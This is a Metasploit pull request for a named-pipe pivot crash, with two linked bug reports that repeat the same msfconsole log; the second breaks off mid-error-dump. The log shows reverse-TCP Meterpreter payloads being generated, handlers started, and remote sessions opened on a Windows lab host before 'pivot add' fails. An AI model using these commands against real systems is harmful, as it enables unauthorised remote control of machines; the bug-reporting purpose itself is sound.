### PR TITLE
Fix smb named pipe pivot crash

### LINKED ISSUE #16641: Error running command pivot: NoMethodError undefined method `meterpreter_logging_config'
```
       =[ metasploit v6.2.2-dev-e79161c236                ]
+ -- --=[ 2225 exploits - 1171 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more

msf6 > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 payload(windows/meterpreter/reverse_tcp) > set lport 4543
lport => 4543
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 10.5.135.101:4543 
msf6 payload(windows/meterpreter/reverse_tcp) > [*] Sending stage (175174 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4543 -> 10.5.132.101:49992) at 2022-06-02 12:21:18 -0500

msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > pivot add -t pipe -l 10.5.132.101 -n msfpipe -a x86 -p windows
[-] Error running command pivot: NoMethodError undefined method `meterpreter_logging_config' for #<#<Class:0x00005578506fced0>:0x00005578506fca48 @module_info_copy={"Name"=>"Meterpreter & Configuration RDI", "Description"=>"Inject Meterpreter & the configuration stub via RDI", "Author"=>["sf", "OJ Reeves"], "References"=>[["URL", "https://github.com/stephenfewer/ReflectiveDLLInjection"], ["URL", "https://github.com/rapid7/ReflectiveDLLInjection"]], "Platform"=>"win", "Arch"=>"x86", "PayloadCompat"=>{"Convention"=>"sockedi handleedi -https"}, "Stage"=>{"Payload"=>""}}, @module_info={"Name"=>"Meterpreter & Configuration RDI", "Description"=>"Inject Meterpreter & the configuration stub via RDI", "Version"=>"0", "Author"=>["sf", "OJ Reeves"], "Arch"=>"x86", "Platform"=>"win", "Ref"=>nil, "Privileged"=>false, "License"=>"Metasploit Framework License (BSD)", "Notes"=>{}, "References"=>[["URL", "https://github.com/stephenfewer/ReflectiveDLLInjection"], ["URL", "https://github.com/rapid7/ReflectiveDLLInjection"]], "PayloadCompat"=>{"Convention"=>"sockedi handleedi -https"}, "Stage"=>{"Payload"=>""}, "Compat"=>{"Encoder"=>{}, "Meterpreter"=>{}, "Nop"=>{}, "Payload"=>{"Convention"=>"sockedi handleedi -https"}}, "Dependencies"=>[], "ConnectionType"=>"none"}, @uuid="ugmwh0tq", @module_store={}, @author=[#<Msf::Author:0x000055785076de28 @name="sf", @email="stephen_fewer@harmonysecurity.com">, #<Msf::Author:0x000055785076dba8 @name="OJ Reeves", @email="">], @arch=["x86"], @platform=#<Msf::Module::PlatformList:0x000055785076d4c8 @platforms=[Msf::Module::Platform::Windows]>, @references=[#<Msf::Module::SiteReference:0x00005578507662e0 @ctx_id="URL", @ctx_val="https://github.com/stephenfewer/ReflectiveDLLInjection", @site="https://github.com/stephenfewer/ReflectiveDLLInjection">, #<Msf::Module::SiteReference:0x0000557850766010 @ctx_id="URL", @ctx_val="https://github.com/rapid7/ReflectiveDLLInjection", @site="https://github.com/rapid7/ReflectiveDLLInjection">], @options={"WORKSPACE"=>#<Msf::OptString:0x0000557850765840 @name="WORKSPACE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Specify the workspace for this module", @default=nil, @enums=[], @owner=Msf::Module>, "VERBOSE"=>#<Msf::OptBool:0x00005578507654f8 @name="VERBOSE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Enable detailed status messages", @default=false, @enums=[], @owner=Msf::Module>, "PingbackRetries"=>#<Msf::OptInt:0x0000557850764b70 @name="PingbackRetries", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="How many additional successful pingbacks", @default=0, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PingbackSleep"=>#<Msf::OptInt:0x00005578507649e0 @name="PingbackSleep", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Time (in seconds) to sleep between pingbacks", @default=30, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PayloadUUIDSeed"=>#<Msf::OptString:0x000055785075feb8 @name="PayloadUUIDSeed", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A string to use when generating the payload UUID (deterministic)", @default=nil, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PayloadUUIDRaw"=>#<Msf::OptString:0x000055785075fd00 @name="PayloadUUIDRaw", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A hex string representing the raw 8-byte PUID value for the UUID", @default=nil, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PayloadUUIDName"=>#<Msf::OptString:0x000055785075fa80 @name="PayloadUUIDName", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A human-friendly name to reference this unique payload (requires tracking)", @default=nil, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PayloadUUIDTracking"=>#<Msf::OptBool:0x000055785075f8c8 @name="PayloadUUIDTracking", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Whether or not to automatically register generated UUIDs", @default=false, @enums=[], @owner=#<Class:0x00005578506fced0>>, "EnableStageEncoding"=>#<Msf::OptBool:0x000055785075cb28 @name="EnableStageEncoding", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Encode the second stage payload", @default=false, @enums=[], @owner=Msf::Payload::Stager>, "StageEncoder"=>#<Msf::OptString:0x000055785075c740 @name="StageEncoder", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Encoder to use if EnableStageEncoding is set", @default=nil, @enums=[], @owner=Msf::Payload::Stager>, "StageEncoderSaveRegisters"=>#<Msf::OptString:0x000055785075c560 @name="StageEncoderSaveRegisters", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Additional registers to preserve in the staged payload if EnableStageEncoding is set", @default="", @enums=[], @owner=Msf::Payload::Stager>, "StageEncodingFallback"=>#<Msf::OptBool:0x000055785075c3a8 @name="StageEncodingFallback", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Fallback to no encoding if the selected StageEncoder is not compatible", @default=true, @enums=[], @owner=Msf::Payload::Stager>, "PrependMigrate"=>#<Msf::OptBool:0x0000557850755fd0 @name="PrependMigrate", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Spawns and runs shellcode in new process", @default=false, @enums=[], @owner=Msf::Payload::Windows>, "PrependMigrateProc"=>#<Msf::OptString:0x0000557850755bc0 @name="PrependMigrateProc", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Process to spawn and run shellcode in", @default=nil, @enums=[], @owner=Msf::Payload::Windows>, "EXITFUNC"=>#<Msf::OptEnum:0x000055785074e938 @name="EXITFUNC", @advanced=false, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc_string="Exit technique", @enums=["''", "seh", "thread", "process", "none"], @default="process", @owner=Msf::Payload::Windows>}, @datastore={"WORKSPACE"=>nil, "VERBOSE"=>false, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "PrependMigrateProc"=>nil, "EXITFUNC"=>"process"}, @privileged=false, @license="Metasploit Framework License (BSD)", @staged=false>
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.132.101 - Meterpreter session 1 closed.  Reason: User exit
msf6 payload(windows/meterpreter/reverse_tcp) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 6454
lport => 6454
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o revtcpx64_meterp_6454.exe
[*] Writing 7168 bytes to revtcpx64_meterp_6454.exe...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 10.5.135.101:6454 
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 10.5.132.101
[*] Meterpreter session 2 opened (10.5.135.101:6454 -> 10.5.132.101:49995) at 2022-06-02 12:23:01 -0500
sessions -i -1
[*] Starting interaction with 2...

meterpreter > pivot add -t pipe -l 10.5.132.101 -n msfpipe -a x64 -p windows
[-] Error running command pivot: NoMethodError undefined method `meterpreter_logging_config' for #<#<Class:0x000055784b7193c8>:0x000055784b38dbf0 @module_info_copy={"Name"=>"Reflective DLL Injection", "Description"=>"Inject a DLL via a reflective loader", "Author"=>["sf", "OJ Reeves"], "References"=>[["URL", "https://github.com/stephenfewer/ReflectiveDLLInjection"], ["URL", "https://github.com/rapid7/ReflectiveDLLInjection"]], "Platform"=>"win", "Arch"=>"x64", "PayloadCompat"=>{"Convention"=>"sockrdi handlerdi -https"}, "Stage"=>{"Payload"=>""}}, @module_info={"Name"=>"Reflective DLL Injection", "Description"=>"Inject a DLL via a reflective loader", "Version"=>"0", "Author"=>["sf", "OJ Reeves"], "Arch"=>"x64", "Platform"=>"win", "Ref"=>nil, "Privileged"=>false, "License"=>"Metasploit Framework License (BSD)", "Notes"=>{}, "References"=>[["URL", "https://github.com/stephenfewer/ReflectiveDLLInjection"], ["URL", "https://github.com/rapid7/ReflectiveDLLInjection"]], "PayloadCompat"=>{"Convention"=>"sockrdi handlerdi -https"}, "Stage"=>{"Payload"=>""}, "Compat"=>{"Encoder"=>{}, "Meterpreter"=>{}, "Nop"=>{}, "Payload"=>{"Convention"=>"sockrdi handlerdi -https"}}, "Dependencies"=>[], "ConnectionType"=>"none"}, @uuid="8nmyuw7v", @module_store={}, @author=[#<Msf::Author:0x000055784b3b4ea8 @name="sf", @email="stephen_fewer@harmonysecurity.com">, #<Msf::Author:0x000055784b42a478 @name="OJ Reeves", @email="">], @arch=["x64"], @platform=#<Msf::Module::PlatformList:0x000055784b2be9b8 @platforms=[Msf::Module::Platform::Windows]>, @references=[#<Msf::Module::SiteReference:0x000055784aa51168 @ctx_id="URL", @ctx_val="https://github.com/stephenfewer/ReflectiveDLLInjection", @site="https://github.com/stephenfewer/ReflectiveDLLInjection">, #<Msf::Module::SiteReference:0x000055784aa4b2b8 @ctx_id="URL", @ctx_val="https://github.com/rapid7/ReflectiveDLLInjection", @site="https://github.com/rapid7/ReflectiveDLLInjection">], @options={"WORKSPACE"=>#<Msf::OptString:0x0000557849feff58 @name="WORKSPACE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Specify the workspace for this module", @default=nil, @enums=[], @owner=Msf::Module>, "VERBOSE"=>#<Msf::OptBool:0x0000557849fe7628 @name="VERBOSE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Enable detailed status messages", @default=false, @enums=[], @owner=Msf::Module>, "PingbackRetries"=>#<Msf::OptInt:0x0000557849fa9350 @name="PingbackRetries", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="How many additional successful pingbacks", @default=0, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PingbackSleep"=>#<Msf::OptInt:0x0000557849fbd5a8 @name="PingbackSleep", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Time (in seconds) to sleep between pingbacks", @default=30, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PayloadUUIDSeed"=>#<Msf::OptString:0x0000557849fa1c18 @name="PayloadUUIDSeed", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A string to use when generating the payload UUID (deterministic)", @default=nil, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PayloadUUIDRaw"=>#<Msf::OptString:0x0000557849f9b930 @name="PayloadUUIDRaw", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A hex string representing the raw 8-byte PUID value for the UUID", @default=nil, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PayloadUUIDName"=>#<Msf::OptString:0x0000557849f9ad28 @name="PayloadUUIDName", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A human-friendly name to reference this unique payload (requires tracking)", @default=nil, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PayloadUUIDTracking"=>#<Msf::OptBool:0x0000557849f99838 @name="PayloadUUIDTracking", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Whether or not to automatically register generated UUIDs", @default=false, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "EnableStageEncoding"=>#<Msf::OptBool:0x000055784a62a008 @name="EnableStageEncoding", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Encode the second stage payload", @default=false, @enums=[], @owner=Msf::Payload::Stager>, "StageEncoder"=>#<Msf::OptString:0x000055784a613128 @name="StageEncoder", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Encoder to use if EnableStageEncoding is set", @default=nil, @enums=[], @owner=Msf::Payload::Stager>, "StageEncoderSaveRegisters"=>#<Msf::OptString:0x000055784a611288 @name="StageEncoderSaveRegisters", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Additional registers to preserve in the staged payload if EnableStageEncoding is set", @default="", @enums=[], @owner=Msf::Payload::Stager>, "StageEncodingFallback"=>#<Msf::OptBool:0x000055784a5f6438 @name="StageEncodingFallback", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Fallback to no encoding if the selected StageEncoder is not compatible", @default=true, @enums=[], @owner=Msf::Payload::Stager>, "PrependMigrate"=>#<Msf::OptBool:0x000055784a4afc50 @name="PrependMigrate", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Spawns and runs shellcode in new process", @default=false, @enums=[], @owner=Msf::Payload::Windows>, "PrependMigrateProc"=>#<Msf::OptString:0x000055784a392368 @name="PrependMigrateProc", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Process to spawn and run shellcode in", @default=nil, @enums=[], @owner=Msf::Payload::Windows>, "EXITFUNC"=>#<Msf::OptEnum:0x000055784b64fd20 @name="EXITFUNC", @advanced=false, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc_string="Exit technique", @enums=["''", "seh", "thread", "process", "none"], @default="process", @owner=Msf::Payload::Windows>}, @datastore={"WORKSPACE"=>nil, "VERBOSE"=>false, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "PrependMigrateProc"=>nil, "EXITFUNC"=>"process"}, @privileged=false, @license="Metasploit Framework License (BSD)", @staged=false>
```

### LINKED ISSUE #16646: bug
```
       =[ metasploit v6.2.2-dev-e79161c236                ]
+ -- --=[ 2225 exploits - 1171 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more

msf6 > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 payload(windows/meterpreter/reverse_tcp) > set lport 4543
lport => 4543
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 10.5.135.101:4543 
msf6 payload(windows/meterpreter/reverse_tcp) > [*] Sending stage (175174 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4543 -> 10.5.132.101:49992) at 2022-06-02 12:21:18 -0500

msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > pivot add -t pipe -l 10.5.132.101 -n msfpipe -a x86 -p windows
[-] Error running command pivot: NoMethodError undefined method `meterpreter_logging_config' for #<#<Class:0x00005578506fced0>:0x00005578506fca48 @module_info_copy={"Name"=>"Meterpreter & Configuration RDI", "Description"=>"Inject Meterpreter & the configuration stub via RDI", "Author"=>["sf", "OJ Reeves"], "References"=>[["URL", "https://github.com/stephenfewer/ReflectiveDLLInjection"], ["URL", "https://github.com/rapid7/ReflectiveDLLInjection"]], "Platform"=>"win", "Arch"=>"x86", "PayloadCompat"=>{"Convention"=>"sockedi handleedi -https"}, "Stage"=>{"Payload"=>""}}, @module_info={"Name"=>"Meterpreter & Configuration RDI", "Description"=>"Inject Meterpreter & the configuration stub via RDI", "Version"=>"0", "Author"=>["sf", "OJ Reeves"], "Arch"=>"x86", "Platform"=>"win", "Ref"=>nil, "Privileged"=>false, "License"=>"Metasploit Framework License (BSD)", "Notes"=>{}, "References"=>[["URL", "https://github.com/stephenfewer/ReflectiveDLLInjection"], ["URL", "https://github.com/rapid7/ReflectiveDLLInjection"]], "PayloadCompat"=>{"Convention"=>"sockedi handleedi -https"}, "Stage"=>{"Payload"=>""}, "Compat"=>{"Encoder"=>{}, "Meterpreter"=>{}, "Nop"=>{}, "Payload"=>{"Convention"=>"sockedi handleedi -https"}}, "Dependencies"=>[], "ConnectionType"=>"none"}, @uuid="ugmwh0tq", @module_store={}, @author=[#<Msf::Author:0x000055785076de28 @name="sf", @email="stephen_fewer@harmonysecurity.com">, #<Msf::Author:0x000055785076dba8 @name="OJ Reeves", @email="">], @arch=["x86"], @platform=#<Msf::Module::PlatformList:0x000055785076d4c8 @platforms=[Msf::Module::Platform::Windows]>, @references=[#<Msf::Module::SiteReference:0x00005578507662e0 @ctx_id="URL", @ctx_val="https://github.com/stephenfewer/ReflectiveDLLInjection", @site="https://github.com/stephenfewer/ReflectiveDLLInjection">, #<Msf::Module::SiteReference:0x0000557850766010 @ctx_id="URL", @ctx_val="https://github.com/rapid7/ReflectiveDLLInjection", @site="https://github.com/rapid7/ReflectiveDLLInjection">], @options={"WORKSPACE"=>#<Msf::OptString:0x0000557850765840 @name="WORKSPACE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Specify the workspace for this module", @default=nil, @enums=[], @owner=Msf::Module>, "VERBOSE"=>#<Msf::OptBool:0x00005578507654f8 @name="VERBOSE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Enable detailed status messages", @default=false, @enums=[], @owner=Msf::Module>, "PingbackRetries"=>#<Msf::OptInt:0x0000557850764b70 @name="PingbackRetries", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="How many additional successful pingbacks", @default=0, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PingbackSleep"=>#<Msf::OptInt:0x00005578507649e0 @name="PingbackSleep", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Time (in seconds) to sleep between pingbacks", @default=30, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PayloadUUIDSeed"=>#<Msf::OptString:0x000055785075feb8 @name="PayloadUUIDSeed", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A string to use when generating the payload UUID (deterministic)", @default=nil, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PayloadUUIDRaw"=>#<Msf::OptString:0x000055785075fd00 @name="PayloadUUIDRaw", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A hex string representing the raw 8-byte PUID value for the UUID", @default=nil, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PayloadUUIDName"=>#<Msf::OptString:0x000055785075fa80 @name="PayloadUUIDName", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A human-friendly name to reference this unique payload (requires tracking)", @default=nil, @enums=[], @owner=#<Class:0x00005578506fced0>>, "PayloadUUIDTracking"=>#<Msf::OptBool:0x000055785075f8c8 @name="PayloadUUIDTracking", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Whether or not to automatically register generated UUIDs", @default=false, @enums=[], @owner=#<Class:0x00005578506fced0>>, "EnableStageEncoding"=>#<Msf::OptBool:0x000055785075cb28 @name="EnableStageEncoding", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Encode the second stage payload", @default=false, @enums=[], @owner=Msf::Payload::Stager>, "StageEncoder"=>#<Msf::OptString:0x000055785075c740 @name="StageEncoder", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Encoder to use if EnableStageEncoding is set", @default=nil, @enums=[], @owner=Msf::Payload::Stager>, "StageEncoderSaveRegisters"=>#<Msf::OptString:0x000055785075c560 @name="StageEncoderSaveRegisters", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Additional registers to preserve in the staged payload if EnableStageEncoding is set", @default="", @enums=[], @owner=Msf::Payload::Stager>, "StageEncodingFallback"=>#<Msf::OptBool:0x000055785075c3a8 @name="StageEncodingFallback", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Fallback to no encoding if the selected StageEncoder is not compatible", @default=true, @enums=[], @owner=Msf::Payload::Stager>, "PrependMigrate"=>#<Msf::OptBool:0x0000557850755fd0 @name="PrependMigrate", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Spawns and runs shellcode in new process", @default=false, @enums=[], @owner=Msf::Payload::Windows>, "PrependMigrateProc"=>#<Msf::OptString:0x0000557850755bc0 @name="PrependMigrateProc", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Process to spawn and run shellcode in", @default=nil, @enums=[], @owner=Msf::Payload::Windows>, "EXITFUNC"=>#<Msf::OptEnum:0x000055785074e938 @name="EXITFUNC", @advanced=false, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc_string="Exit technique", @enums=["''", "seh", "thread", "process", "none"], @default="process", @owner=Msf::Payload::Windows>}, @datastore={"WORKSPACE"=>nil, "VERBOSE"=>false, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "PrependMigrateProc"=>nil, "EXITFUNC"=>"process"}, @privileged=false, @license="Metasploit Framework License (BSD)", @staged=false>
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.132.101 - Meterpreter session 1 closed.  Reason: User exit
msf6 payload(windows/meterpreter/reverse_tcp) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 6454
lport => 6454
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o revtcpx64_meterp_6454.exe
[*] Writing 7168 bytes to revtcpx64_meterp_6454.exe...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 10.5.135.101:6454 
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 10.5.132.101
[*] Meterpreter session 2 opened (10.5.135.101:6454 -> 10.5.132.101:49995) at 2022-06-02 12:23:01 -0500
sessions -i -1
[*] Starting interaction with 2...

meterpreter > pivot add -t pipe -l 10.5.132.101 -n msfpipe -a x64 -p windows
[-] Error running command pivot: NoMethodError undefined method `meterpreter_logging_config' for #<#<Class:0x000055784b7193c8>:0x000055784b38dbf0 @module_info_copy={"Name"=>"Reflective DLL Injection", "Description"=>"Inject a DLL via a reflective loader", "Author"=>["sf", "OJ Reeves"], "References"=>[["URL", "https://github.com/stephenfewer/ReflectiveDLLInjection"], ["URL", "https://github.com/rapid7/ReflectiveDLLInjection"]], "Platform"=>"win", "Arch"=>"x64", "PayloadCompat"=>{"Convention"=>"sockrdi handlerdi -https"}, "Stage"=>{"Payload"=>""}}, @module_info={"Name"=>"Reflective DLL Injection", "Description"=>"Inject a DLL via a reflective loader", "Version"=>"0", "Author"=>["sf", "OJ Reeves"], "Arch"=>"x64", "Platform"=>"win", "Ref"=>nil, "Privileged"=>false, "License"=>"Metasploit Framework License (BSD)", "Notes"=>{}, "References"=>[["URL", "https://github.com/stephenfewer/ReflectiveDLLInjection"], ["URL", "https://github.com/rapid7/ReflectiveDLLInjection"]], "PayloadCompat"=>{"Convention"=>"sockrdi handlerdi -https"}, "Stage"=>{"Payload"=>""}, "Compat"=>{"Encoder"=>{}, "Meterpreter"=>{}, "Nop"=>{}, "Payload"=>{"Convention"=>"sockrdi handlerdi -https"}}, "Dependencies"=>[], "ConnectionType"=>"none"}, @uuid="8nmyuw7v", @module_store={}, @author=[#<Msf::Author:0x000055784b3b4ea8 @name="sf", @email="stephen_fewer@harmonysecurity.com">, #<Msf::Author:0x000055784b42a478 @name="OJ Reeves", @email="">], @arch=["x64"], @platform=#<Msf::Module::PlatformList:0x000055784b2be9b8 @platforms=[Msf::Module::Platform::Windows]>, @references=[#<Msf::Module::SiteReference:0x000055784aa51168 @ctx_id="URL", @ctx_val="https://github.com/stephenfewer/ReflectiveDLLInjection", @site="https://github.com/stephenfewer/ReflectiveDLLInjection">, #<Msf::Module::SiteReference:0x000055784aa4b2b8 @ctx_id="URL", @ctx_val="https://github.com/rapid7/ReflectiveDLLInjection", @site="https://github.com/rapid7/ReflectiveDLLInjection">], @options={"WORKSPACE"=>#<Msf::OptString:0x0000557849feff58 @name="WORKSPACE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Specify the workspace for this module", @default=nil, @enums=[], @owner=Msf::Module>, "VERBOSE"=>#<Msf::OptBool:0x0000557849fe7628 @name="VERBOSE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Enable detailed status messages", @default=false, @enums=[], @owner=Msf::Module>, "PingbackRetries"=>#<Msf::OptInt:0x0000557849fa9350 @name="PingbackRetries", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="How many additional successful pingbacks", @default=0, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PingbackSleep"=>#<Msf::OptInt:0x0000557849fbd5a8 @name="PingbackSleep", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Time (in seconds) to sleep between pingbacks", @default=30, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PayloadUUIDSeed"=>#<Msf::OptString:0x0000557849fa1c18 @name="PayloadUUIDSeed", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A string to use when generating the payload UUID (deterministic)", @default=nil, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PayloadUUIDRaw"=>#<Msf::OptString:0x0000557849f9b930 @name="PayloadUUIDRaw", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A hex string representing the raw 8-byte PUID value for the UUID", @default=nil, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PayloadUUIDName"=>#<Msf::OptString:0x0000557849f9ad28 @name="PayloadUUIDName", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="A human-friendly name to reference this unique payload (requires tracking)", @default=nil, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "PayloadUUIDTracking"=>#<Msf::OptBool:0x0000557849f99838 @name="PayloadUUIDTracking", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=true, @desc="Whether or not to automatically register generated UUIDs", @default=false, @enums=[], @owner=#<Class:0x000055784b7193c8>>, "EnableStageEncoding"=>#<Msf::OptBool:0x000055784a62a008 @name="EnableStageEncoding", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Encode the second stage payload", @default=false, @enums=[], @owner=Msf::Payload::Stager>, "StageEncoder"=>#<Msf::OptString:0x000055784a613128 @name="StageEncoder", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @required=false, @desc="Encoder to use if EnableStageEncoding is set", @default=nil, @enums=[], @owner=Msf::Payload::Stager>, 